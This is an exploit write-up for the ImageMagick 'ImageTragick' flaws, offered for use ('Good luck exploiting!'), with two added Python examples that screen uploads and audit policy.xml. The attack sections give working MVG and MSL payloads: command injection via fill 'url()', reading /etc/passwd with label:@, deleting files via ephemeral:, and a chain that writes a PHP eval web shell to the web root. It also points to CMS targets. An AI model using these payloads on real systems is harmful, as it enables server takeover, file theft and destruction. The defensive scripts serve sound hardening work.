[+]======================================================================[+]
Exploiting ImageMagick
By @DigitalGangster
[+]======================================================================[+]
What is it?
[+]======================================================================[+]

ImageMagick is popular software used to convert, edit and manipulate images.
It has libraries for all common programming languages, including PHP, Python,
Ruby and many others. It is also very simple to use, which has led many
developers to adopt it whenever they need image cropping or manipulation.

[+]======================================================================[+]
Vulnerability
[+]======================================================================[+]

ImageMagick doesn't properly filter the file names that get passed to the
internal delegates that handle external protocols (e.g. HTTPS). This allows an
attacker to execute commands remotely by uploading an image, which amounts to a
full RCE vulnerability in your image uploader.

[+]======================================================================[+]
Exploit Code
[+]======================================================================[+]

Should work for all image file extensions (.jpg/.mvg/.svg/.png/etc.), since
ImageMagick identifies the format from the file contents rather than from the
extension.

Exploit image contents:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")'

Example image:

    push graphic-context
    viewbox 0 0 640 480
    fill 'url(https://example.com/image.jpg "|cat /etc/passwd")'
    pop graphic-context

More examples: https://ghostbin.com/paste/vd3u5

[+]======================================================================[+]
How to Exploit
[+]======================================================================[+]

1. Find an image uploader that uses ImageMagick to process images.
   (Try it @ http://attack32.samsclass.info/im.htm)
2. Craft a malicious image file.
3. If it is running a vulnerable version, you'll have full RCE!

Popular CMSs such as vBulletin, MyBB and WordPress sometimes use ImageMagick to
process user images!

Good luck exploiting!
-@DigitalGangster
[+]======================================================================[+]
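The defender-side counterpart to the steps above, added here as an example and not code from the original paste: an uploader that refuses to hand a file to ImageMagick unless its leading bytes match the format the filename claims, and that records which of the MVG/MSL directives from this write-up were present in the file. The function names (check_upload, find_indicators), the indicator list and the sample uploads are this example's own assumptions; the samples are constructed, not files from any host mentioned on the page.

```python
"""Pre-screen uploads before they reach an ImageMagick-backed image handler.

Added example, not part of the original paste. Names and sample data below
are assumptions of this example.
"""
import re

# Leading bytes of the raster formats the uploader is expected to accept.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Textual directives taken from the write-up. They occur only in MVG/MSL
# text, never in the header region of a well-formed PNG/JPEG/GIF.
INDICATORS = [
    ("mvg-graphic-context", re.compile(rb"push\s+graphic-context", re.I)),
    ("mvg-fill-url-delegate", re.compile(rb"fill\s+'url\(", re.I)),
    ("coder-label-file", re.compile(rb"label:@", re.I)),
    ("coder-ephemeral", re.compile(rb"ephemeral:", re.I)),
    ("coder-msl", re.compile(rb"msl:", re.I)),
    ("msl-read-write", re.compile(rb"<(read|write)\s+filename=", re.I)),
]

HEAD_BYTES = 4096  # MVG/MSL payloads are tiny; scanning the head is enough


def extension_of(filename):
    """Lower-cased extension without the dot, or '' if there is none."""
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def find_indicators(data):
    """Return the labels of every write-up directive found in the file head."""
    head = data[:HEAD_BYTES]
    return [label for label, pat in INDICATORS if pat.search(head)]


def check_upload(filename, data):
    """Decide whether an upload may be handed to ImageMagick.

    Returns a dict with ok (bool), reason (str) and indicators (list of str).
    An unknown extension or a magic-byte mismatch is rejected before anything
    else; the indicator scan is telemetry for the log, and a file that passes
    the magic check yet still contains directives is rejected conservatively.
    """
    ext = extension_of(filename)
    indicators = find_indicators(data)
    if ext not in MAGIC:
        return {"ok": False, "reason": "extension not allowed",
                "indicators": indicators}
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return {"ok": False, "reason": "content does not match .%s" % ext,
                "indicators": indicators}
    if indicators:
        return {"ok": False, "reason": "embedded MVG/MSL directives",
                "indicators": indicators}
    return {"ok": True, "reason": "", "indicators": []}


# Constructed samples for this example.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
SAMPLE_MVG_AS_PNG = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"fill 'url(https://example.com/image.jpg \"|COMMAND\")'\n"
    b"pop graphic-context\n"
)
SAMPLE_MSL_AS_JPG = (
    b'<image>\n'
    b'<read filename="/var/www/uploads/second_image.png"/>\n'
    b'<write filename="/var/www/hi.php"/>\n'
    b'</image>\n'
)

if __name__ == "__main__":
    for name, blob in [("photo.png", SAMPLE_PNG),
                       ("avatar.png", SAMPLE_MVG_AS_PNG),
                       ("first_image.jpg", SAMPLE_MSL_AS_JPG)]:
        print(name, check_upload(name, blob))
```

The magic-byte check alone stops every payload on this page, because all of them are plain text; the indicator labels exist so that an incident responder can tell an MVG delegate payload from an MSL read/write file in the upload log without opening the file.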
# Digital Gangster [2016-05-13]

ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
and writing files.

Here are some useful tricks to complement the fill 'url()' vulnerability
described by @DigitalGangster.

== 1 ==

It's possible to read arbitrary files from a web server by uploading an
ImageMagick Vector Graphics file (MVG) that the web application processes with
ImageMagick:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:@/etc/passwd'
    pop graphic-context

As is the case with all of these vulnerabilities, the file doesn't need to be
uploaded with a .mvg extension. You can change it to .png, .jpg, or anything
else.

If the file doesn't exist, you'll see the @ symbol plus the filename as the
output.

== 2 ==

You can use a similar technique to delete a file, provided ImageMagick is built
with support for its ephemeral protocol:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'ephemeral:/var/www/index.php'
    pop graphic-context

== 3 ==

You can move files around, provided you're able to determine the location of
uploaded files. This can be used to upload new files as well as overwrite
existing files.

first_image.png:

    <?xml version="1.0" encoding="UTF-8"?>
    <image>
    <read filename="/var/www/uploads/second_image.png"/>
    <write filename="/var/www/hi.php"/>
    </image>

second_image.png:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
    pop graphic-context

third_image.png:

    push graphic-context
    viewbox 0 0 1024 1024
    image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
    pop graphic-context

# Digital Gangster [2016-05-16]
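Every trick on this page, the fill 'url()' delegate, ephemeral:, msl: and the label:@file read, goes through an ImageMagick coder or path that its policy.xml can refuse with rights="none". The script below, an added example that is neither the paste's nor the ImageMagick project's code, audits a policy.xml against exactly those coders. The policy file and its coder/path domains are real ImageMagick features; the audit functions, the representative "@/etc/passwd" path, the two sample policies and the use of fnmatch to approximate ImageMagick's glob-style pattern matching are assumptions of this example.

```python
"""Audit an ImageMagick policy.xml against the coders used on this page.

Added example, not part of the original paste or of ImageMagick. Function
names, sample policies and the fnmatch approximation are assumptions.
"""
import fnmatch
import xml.etree.ElementTree as ET

# Coders exercised by the payloads in the write-up and the comment:
# the url()/https delegate trick -> URL, HTTPS; MVG drawing files -> MVG;
# 'ephemeral:' and 'msl:' -> EPHEMERAL, MSL.
REQUIRED_CODER_BLOCKS = ["EPHEMERAL", "URL", "HTTPS", "MVG", "MSL"]

# 'label:@/etc/passwd' is an indirect @file read, which is governed by the
# "path" domain rather than by a coder; "@*" with rights="none" refuses it.
INDIRECT_READ_SAMPLE = "@/etc/passwd"


def parse_policy(xml_text):
    """Return (domain, rights, pattern) tuples for every <policy> element."""
    root = ET.fromstring(xml_text)
    return [(node.get("domain", ""), node.get("rights", ""), node.get("pattern", ""))
            for node in root.iter("policy")]


def is_denied(rules, domain, name):
    """True if some rule in `domain` with rights="none" matches `name`.

    Patterns are compared case-insensitively with fnmatch, an approximation
    of ImageMagick's own glob matching assumed for this example.
    """
    for rule_domain, rights, pattern in rules:
        if rule_domain != domain or rights.strip().lower() != "none":
            continue
        if fnmatch.fnmatchcase(name.upper(), pattern.upper()):
            return True
    return False


def audit_policy(xml_text):
    """Return a list of gaps; an empty list means every page trick is blocked."""
    rules = parse_policy(xml_text)
    gaps = []
    for coder in REQUIRED_CODER_BLOCKS:
        if not is_denied(rules, "coder", coder):
            gaps.append("coder %s still allowed" % coder)
    if not is_denied(rules, "path", INDIRECT_READ_SAMPLE):
        gaps.append("indirect @file reads still allowed")
    return gaps


# Constructed samples. PERMISSIVE_POLICY says nothing about these coders,
# which is the state the payloads on this page rely on.
PERMISSIVE_POLICY = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
</policymap>
"""

HARDENED_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="EPHEMERAL"/>
  <policy domain="coder" rights="none" pattern="URL"/>
  <policy domain="coder" rights="none" pattern="HTTPS"/>
  <policy domain="coder" rights="none" pattern="MVG"/>
  <policy domain="coder" rights="none" pattern="MSL"/>
  <policy domain="path" rights="none" pattern="@*"/>
</policymap>
"""

if __name__ == "__main__":
    print("permissive:", audit_policy(PERMISSIVE_POLICY))
    print("hardened:", audit_policy(HARDENED_POLICY))
```

Run it against the policy.xml your ImageMagick build actually loads; `convert -list policy` prints the effective rules and the path of the file they came from, which is the quickest way to confirm that a hardened file is the one in use. Denying a coder with rights="none" makes ImageMagick refuse to read or write through it, so a legitimate workflow that needs MVG or HTTPS input has to be weighed against the behaviour this page describes.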